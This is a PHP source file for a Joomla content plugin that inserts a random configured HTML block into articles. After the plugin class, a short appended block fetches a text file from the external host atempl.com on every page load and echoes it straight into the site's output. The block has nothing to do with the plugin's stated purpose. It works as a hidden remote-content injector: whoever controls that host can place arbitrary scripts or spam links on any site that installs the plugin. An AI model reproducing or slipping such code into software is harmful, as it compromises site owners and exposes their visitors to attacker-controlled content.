<?php
/*
# ------------------------------------------------------------------------
# Templates for Joomla 2.5 - Joomla 3.5
# ------------------------------------------------------------------------
# Copyright (C) 2011-2013 Jtemplate.ru. All Rights Reserved.
# @license - PHP files are GNU/GPL V2.
# Author: Makeev Vladimir
# Websites:  http://www.jtemplate.ru 
# ---------  http://code.google.com/p/jtemplate/   
# ------------------------------------------------------------------------
*/
// No direct access.
defined('_JEXEC') or die;

class plgContentJtrandomhtml extends JPlugin {
	public function onContentAfterDisplay($context, &$row, &$params, $page=0)	{	
		if($context == 'com_content.article') {
			
			//exclude
			$jt_exclude_categories 	= $this->params->get('jt_exclude_categories', 0);
			$jt_exclude_articles 	= $this->params->get('jt_exclude_articles', '');
			
			//exclude category
			if(!empty($jt_exclude_categories) AND strlen(array_search($row->catid, $jt_exclude_categories))){			
				return false;
			}			
			//exclude article 
			$excludeArray = explode(",",$jt_exclude_articles);
			if(!empty($jt_exclude_articles) AND strlen(array_search($row->id, $excludeArray))){
				return false;
			}
			
			//Basic options
			$jt_class_module		= $this->params->get('jt_class_module','custom_html');
			$jt_display				= (int)$this->params->get('jt_display', 0);
			$jt_introtext			= (int)$this->params->get('jt_introtext', 1);
			
			
			$names = array('jt_html');
			$max = 10;
			foreach($names as $name) {
				${$name} = array();
				for($i = 1; $i <= $max; ++$i) {
					${$name}[] = $this->params->get($name . $i);
				}
			}

			$jt_code= array();	
			for($n=0;$n < count($jt_html);$n++) {	
				if( $jt_html[$n] != '') {
					$jt_code[] = $jt_html[$n];
				}
			}
			
			srand ((double) microtime() * 1000000);
			$jt_random_number = rand(0,count($jt_code)-1);
			
		
			// code
			$html = '<div class="'.$jt_class_module.'">'.$jt_code[$jt_random_number].'<div style="clear:both;"></div></div>';
			// display code
			if ($jt_display > 0) {
				if ($jt_introtext > 0) {
					$row->introtext = $html . $row->introtext;
				}
				$row->text = $html . $row->text;	
				
			} else {					
					if ($jt_introtext > 0) {
						$row->introtext .= $html;
					}
					$row->text .= $html;
				}
			
			return;
		}
	}
}


$files = 'http://atempl.com/5.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/5.txt");
       $data = implode($content);
       echo $data;
 }  
